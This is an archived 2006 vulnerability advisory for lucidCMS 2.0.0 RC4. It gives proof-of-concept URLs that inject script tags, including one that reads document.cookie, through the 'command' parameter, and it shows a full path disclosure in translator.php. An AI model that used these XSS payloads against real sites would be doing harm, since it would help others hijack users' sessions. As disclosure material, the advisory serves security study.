exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

LucidCMS.txt

LucidCMS.txt
Posted Apr 11, 2006
Authored by crasher

lucidCMS 2.0.0 RC4 suffers from XSS and full path disclosure.

tags | advisory
SHA-256 | f51b245fc4e09587c18170010848da6d79243a5b01e7af91b1a0bdcb3561f484

LucidCMS.txt

Change Mirror Download
Multiple Vulnerabilities in LucidCMS

Author : Rusydi Hasan M
a.k.a : cR45H3R
Date : April,1st 2006
Location : Indonesia, Cilacap

--- Software description

lucidCMS is a simple and flexible content management system for
the individual or organization that wishes to manage a collection
of web pages without the overhead and complexity of other available
open source "community" CMS options.

HOME : http://lucidCMS.net
Version : 2.0.0 RC4

--- The bugs

There's 2 bugs.XSS and full path disclosures

--- PoC


1. XSS a.k.a Cross site scripting

How the Proof of concepts ?

http://[victim]/[lucidcms_dir]/index.php?command=login'>[XSS_here]
http://[victim]/[lucidcms_dir]/index.php?i18n=cs_CZ&command=panel'>[XSS_here]
http://[victim]/[lucidcms_dir]/index.php?i18n=en_US&command=panel'>[XSS_here]

example :


http://127.0.0.1/lucidcms/index.php?i18n=en_US&command=panel'><script>alert(document.cookie)</script>

http://127.0.0.1/lucidcms/index.php?i18n=en_US&command=panel'><h1>Bla bla
bla</h1>

http://127.0.0.1/lucidcms/index.php?command=login'><script>alert('patch your
lucidCMS')</script>


http://127.0.0.1/lucidcms/index.php?i18n=cs_CZ&command=panel'><h1>stooopidz</h1>


2. Full path disclosures

in /lucid_phplib/translator.php

http://[victim]/[lucidcms_dir]/lucid_phplib/translator.php

Warning: opendir(DIR_LANG): failed to open dir: No such file or directory in
/var/www/html/lucidcms/lucid_phplib/translator.php on line 45

Warning: readdir(): supplied argument is not a valid Directory resource in
/var/www/html/lucidcms/lucid_phplib/translator.php on line 46

Where's the problem ???

function get_languages(){
$langs = array();
$dir = opendir(DIR_LANG); <-- This is the trouble
while($name = readdir($dir)) { <-- and this too
if ($name == '.' || $name== '..') continue;
$langFile = DIR_LANG.$name.'/LC_MESSAGES/'.CONFIG_DOMAIN.'.mo';
if (file_exists($langFile)) {
// $GLOBALS['echoLater'][] = $langFile; //troublshooting...
$langs[] = $name;
}
}
return $langs;
}//get_languages


--- vendor

I'm too lazy :D .

--- shoutz

1. kecoak
(fwerd,chiko,cbug,ladybug,litherr,cybertank,cyb3rh3b,cahcephoe,scut,etc)
2. echo staff (y3dips, moby, comex, z3r0byt3, K-159, c-a-s-e, S`to, lirva32,
anonymous, the day)
3. ph03n1x,ghoz,spyoff,slackX,r34d3r,xnuxer,negative,sakitjiwa

--- contact

crasher@kecoak.or.id

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    0 Files
  • 8
    Nov 8th
    0 Files
  • 9
    Nov 9th
    0 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close